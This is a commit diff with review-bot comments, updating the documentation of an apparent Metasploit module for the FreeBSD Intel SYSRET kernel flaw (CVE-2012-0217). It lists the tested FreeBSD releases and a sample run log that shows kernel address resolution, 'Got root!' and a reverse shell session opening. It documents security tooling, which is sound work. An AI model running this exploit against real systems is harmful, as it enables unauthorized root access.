Update documentation

master
Brendan Coles 2018-12-14 11:00:18 +00:00
parent e4fc4e654d
commit 1cf5c79cc8
1 changed files with 31 additions and 9 deletions


@ -1,7 +1,7 @@
## Description
This module exploits a vulnerability in the FreeBSD 9.0-RELEASE (x64)
kernel, when running on 64-bit Intel processors.
This module exploits a vulnerability in the FreeBSD kernel,
when running on 64-bit Intel processors.
By design, 64-bit processors following the X86-64 specification will
trigger a general protection fault (GPF) when executing a SYSRET
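Review bot: The rewritten Description drops the version from "FreeBSD 9.0-RELEASE (x64)" to "the FreeBSD kernel" but still never names the vulnerability; add the CVE identifier that the module's own output prints (`[*] CVE-2012-0217 Intel sysret exploit -- iZsh`) so the description can be matched to the advisory and to the version list under Vulnerable Application, which is now the only place the affected releases appear.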
@ -15,7 +15,10 @@
## Vulnerable Application
This module has been tested successfully on FreeBSD 9.0-RELEASE.
This module has been tested successfully on:
* FreeBSD 8.3-RELEASE (amd64)
* FreeBSD 9.0-RELEASE (amd64)
## Verification Steps
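Review bot: The Vulnerable Application list now claims FreeBSD 8.3-RELEASE (amd64) and 9.0-RELEASE (amd64), but the Verification Steps output below only shows a 9.0-RELEASE run (`[*] [+] release: 9.0-RELEASE`); either state that the sample output was captured on 9.0-RELEASE or add a second run so the 8.3 entry is backed by evidence in the doc.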
@ -64,12 +67,31 @@
[*] Max line length is 131073
[*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] [+] SYSRET FUCKUP!!
[*] [+] Start Engine...
[*] [+] Crotz...
[*] [+] Crotz...
[*] [+] Crotz...
[*] [+] Woohoo!!!
[*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
[*]
[*] [*] Retrieving host information...
[*] [+] CPU: GenuineIntel
[*] [+] sysname: FreeBSD
[*] [+] release: 9.0-RELEASE
[*] [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
[*] [+] machine: amd64
[*] [*] Validating target OS and version...
[*] [+] Vulnerable :-)
[*] [*] Resolving kernel addresses...
[*] [+] Resolved Xofl to 0xffffffff80b02e70
[*] [+] Resolved Xbnd to 0xffffffff80b02ea0
[*] [+] Resolved Xill to 0xffffffff80b02ed0
[*] [+] Resolved Xdna to 0xffffffff80b02f00
[*] [+] Resolved Xpage to 0xffffffff80b03240
[*] [+] Resolved Xfpu to 0xffffffff80b02fc0
[*] [+] Resolved Xalign to 0xffffffff80b03080
[*] [+] Resolved Xmchk to 0xffffffff80b02f60
[*] [+] Resolved Xxmm to 0xffffffff80b02ff0
[*] [*] Setup...
[*] [+] Trigger code...
[*] [+] Trampoline code...
[*] [*] Fire in the hole!
[*] [*] Got root!
[+] Success! Executing payload...
[*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500
[+] Deleted /tmp/.mTaR4rAPd.c
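Review bot: The resolved kernel addresses in the sample output (`[*] [+] Resolved Xofl to 0xffffffff80b02e70` and the lines that follow) are specific to the GENERIC kernel build named in the version line (`root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC`), and the session endpoints (`123.123.123.188:4444 -> 123.123.123.136:61024`) are illustrative; add a sentence before the transcript saying that these values vary per target so a reader does not treat different addresses as a failed run. Keep the captured lines themselves verbatim, including the exploit's own banner text.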